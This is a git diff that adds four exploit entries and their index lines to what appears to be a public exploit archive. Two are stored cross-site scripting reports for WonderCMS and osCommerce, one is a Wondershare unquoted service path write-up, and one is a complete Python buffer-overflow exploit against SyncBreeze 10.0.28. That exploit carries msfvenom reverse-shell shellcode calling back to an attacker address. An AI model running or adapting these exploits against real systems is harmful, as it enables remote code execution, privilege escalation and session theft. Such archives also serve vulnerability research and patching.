diff --git a/exploits/php/webapps/49102.txt b/exploits/php/webapps/49102.txt new file mode 100644 index 000000000..85afb2c42 --- /dev/null +++ b/exploits/php/webapps/49102.txt @@ -0,0 +1,22 @@ +# Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting +# Date: 20-11-2020 +# Exploit Author: Mayur Parmar +# Vendor Homepage: https://www.wondercms.com/ +# Version: 3.1.3 +# Tested on: PopOS + +Stored Cross-site scripting(XSS): +Stored attacks are those where the injected script is permanently stored on the target servers, +such as in a database, in a message forum, visitor log, comment field, etc. +The victim then retrieves the malicious script from the server when it requests the stored information. +Stored XSS is also sometimes referred to as Persistent XSS. + +Attack vector: +This vulnerability can results attacker to inject the XSS payload in Page keywords and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. + +Vulnerable Parameters: Page Title. + +Steps-To-Reproduce: +1. Go to the Simple website builder. +2. Put this payload in Page keywords: Mayur"> +3. Now go to the website and the XSS will be triggered. \ No newline at end of file diff --git a/exploits/php/webapps/49103.txt b/exploits/php/webapps/49103.txt new file mode 100644 index 000000000..3d78d40cd --- /dev/null +++ b/exploits/php/webapps/49103.txt @@ -0,0 +1,112 @@ +# Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting +# Date: 2020-11-19 +# Exploit Author: Emre Aslan +# Vendor Homepage: https://www.oscommerce.com/ +# Version: 2.3.4.1 +# Tested on: Windows & XAMPP + +==> Tutorial <== + +1- Login to admin panel. +2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new +3- Enter the XSS payload into the title section and save it. + +==> Vulnerable Parameter <== + +title= (post parameter) + +==> HTTP Request <== + +POST /catalog/admin/newsletters.php?action=insert HTTP/1.1 +Host: (HOST) +Connection: keep-alive +Content-Length: 123 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://(HOST)/ +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://(HOST)/catalog/admin/newsletters.php?action=new +Accept-Encoding: gzip, deflate, br +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: osCAdminID=s11ou44m0vrasducn78c6sg + +module=newsletter&title=">&content=xss + +==> Vulnerable Source Code <== + +
+ + + + + + + +
+ + + + +
Newsletter Manager
+ + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
NewslettersSizeModuleSentStatusAction 
Preview ">3 bytesnewsletterFalseUnlocked 
Preview ">7 bytesnewsletterFalseUnlockedInfo 
+ + + + + + + +
Displaying 1 to 2 (of 2 newsletters)Page 1 of 1
New Newsletter
+ + + + +
">
+ + + + + + + +
PreviewLock

Date Added: 11/19/2020
+
+
\ No newline at end of file diff --git a/exploits/windows/local/49101.txt b/exploits/windows/local/49101.txt new file mode 100644 index 000000000..bafbade3e --- /dev/null +++ b/exploits/windows/local/49101.txt @@ -0,0 +1,27 @@ +# Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path +# Date: 2020-11-24 +# Exploit Author: Luis Sandoval +# Vendor Homepage: https://www.wondershare.com/ +# Software Link: https://www.wondershare.com/drfone/ +# Version: 10.7.1.321 +# Tested on: Windows 10 Home Single Language x64 Esp + +# Service info: + +C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ + +Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe Auto + +C:\Users\user>sc qc ElevationService +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: ElevationService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Wondershare Driver Install Service help + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/webapps/49104.py b/exploits/windows/webapps/49104.py new file mode 100755 index 000000000..68029247d --- /dev/null +++ b/exploits/windows/webapps/49104.py @@ -0,0 +1,70 @@ +# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow +# Date: 18-Sep-2020 +# Exploit Author: Abdessalam king(A.salam) +# Vendor Homepage: http://www.syncbreeze.com +# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe +# Version: 10.0.28 +# Tested on: Windows 7,windows xp,windows 10 +#72413372 [*] Exact match at offset 520 +#jmp esp FFE4 \xff\xe4 +#!mona modules +#!mona find -s "\xff\xe4" -m libspp.dll +#address esp => 10090C83 +#badchars ==> "\x00\x0a\x0d\x25\x26\x2b\x3d" +#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c +-b "\x00\x0a\x0d\x25\x26\x2b\x3d" EXITFUNC=thread +#!/usr/bin/python +import socket + +shell ="" +shell +="\xba\x4b\x38\x98\x39\xdd\xc7\xd9\x74\x24\xf4\x5f\x33\xc9\xb1" +shell +="\x53\x83\xef\xfc\x31\x57\x10\x03\x57\x10\xa9\xcd\x64\xd1\xaf" +shell +="\x2e\x95\x22\xcf\xa7\x70\x13\xcf\xdc\xf1\x04\xff\x97\x54\xa9" +shell +="\x74\xf5\x4c\x3a\xf8\xd2\x63\x8b\xb6\x04\x4d\x0c\xea\x75\xcc" +shell +="\x8e\xf0\xa9\x2e\xae\x3b\xbc\x2f\xf7\x21\x4d\x7d\xa0\x2e\xe0" +shell +="\x92\xc5\x7a\x39\x18\x95\x6b\x39\xfd\x6e\x8a\x68\x50\xe4\xd5" +shell +="\xaa\x52\x29\x6e\xe3\x4c\x2e\x4a\xbd\xe7\x84\x21\x3c\x2e\xd5" +shell +="\xca\x93\x0f\xd9\x39\xed\x48\xde\xa1\x98\xa0\x1c\x5c\x9b\x76" +shell +="\x5e\xba\x2e\x6d\xf8\x49\x88\x49\xf8\x9e\x4f\x19\xf6\x6b\x1b" +shell +="\x45\x1b\x6a\xc8\xfd\x27\xe7\xef\xd1\xa1\xb3\xcb\xf5\xea\x60" +shell +="\x75\xaf\x56\xc7\x8a\xaf\x38\xb8\x2e\xbb\xd5\xad\x42\xe6\xb1" +shell +="\x02\x6f\x19\x42\x0c\xf8\x6a\x70\x93\x52\xe5\x38\x5c\x7d\xf2" +shell +="\x3f\x77\x39\x6c\xbe\x77\x3a\xa4\x05\x23\x6a\xde\xac\x4b\xe1" +shell +="\x1e\x50\x9e\x9c\x15\xf7\x70\x83\xd7\x6d\x71\x29\x2a\x1a\x9b" +shell +="\xa2\xf5\x3a\xa4\x68\x9e\xd3\x58\x93\xbe\xb3\xd5\x75\xaa\xa3" +shell +="\xb3\x2e\x43\x06\xe0\xe6\xf4\x79\xc3\x8c\x3b\xf0\xb3\xd9\xd3" +shell +="\x4c\xaa\xde\xdc\x4c\xf9\x48\x4b\xc7\xed\x4c\x6a\xd8\x38\xe5" +shell +="\xfb\x4f\xb7\x64\x49\xf1\xc8\xac\x3b\xf1\x5c\x4b\xea\xa6\xc8" +shell +="\x51\xcb\x81\x57\xa9\x3e\x92\x9f\x55\xbf\xb8\xd4\x60\x55\x83" +shell +="\x82\x8c\xb9\x03\x52\xdb\xd3\x03\x3a\xbb\x87\x57\x5f\xc4\x1d" +shell +="\xc4\xcc\x51\x9e\xbd\xa1\xf2\xf6\x43\x9c\x35\x59\xbb\xcb\x45" +shell +="\x9e\x43\x8d\x4e\x5e\x87\x58\x97\x15\xee\x59\xac\x36\xed\x77" +shell +="\xd9\xde\xa8\x12\x60\x83\x4a\xc9\xa7\xba\xc8\xfb\x57\x39\xd0" +shell +="\x8e\x52\x05\x56\x63\x2f\x16\x33\x83\x9c\x17\x16"; + + +payload = "username=AAAAA&password="+"A"*520+"\x83\x0c\x09\x10"+ "\x90" * +20 + shell +"\x90"*(1400-520-4-20-len(shell)) +req ="" +req += "POST /login HTTP/1.1\r\n" +req += "Host: 192.168.1.20\r\n" +req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0\r\n" +req += "Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +req += "Accept-Language: en-US,en;q=0.5\r\n" +req += "Accept-Encoding: gzip, deflate\r\n" +req += "Referer: http://192.168.1.20/login\r\n" +req += "Content-Type: application/x-www-form-urlencoded\r\n" +req += "Content-Length: "+str(len(payload))+"\r\n" +req += "Connection: keep-alive\r\n" +req += "Upgrade-Insecure-Requests: 1\r\n" +req += "\r\n" +req += payload +# print req +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect(("192.168.1.20",80)) +s.send(req) +print s.recv(1024) + +s.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 29cfa77c7..1760597e3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11206,6 +11206,7 @@ id,file,description,date,author,type,platform,port 49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows, 49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows, 49100,exploits/windows/local/49100.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-11-24,MasterVlad,local,windows, +49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -43326,3 +43327,6 @@ id,file,description,date,author,type,platform,port 49097,exploits/hardware/webapps/49097.txt,"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)",2020-11-24,maj0rmil4d,webapps,hardware, 49098,exploits/php/webapps/49098.txt,"OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)",2020-11-24,"Hemant Patidar",webapps,php, 49099,exploits/php/webapps/49099.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,php, +49102,exploits/php/webapps/49102.txt,"WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting",2020-11-25,"Mayur Parmar",webapps,php, +49103,exploits/php/webapps/49103.txt,"osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting",2020-11-25,"Emre Aslan",webapps,php, +49104,exploits/windows/webapps/49104.py,"SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow",2020-11-25,"Abdessalam king",webapps,windows,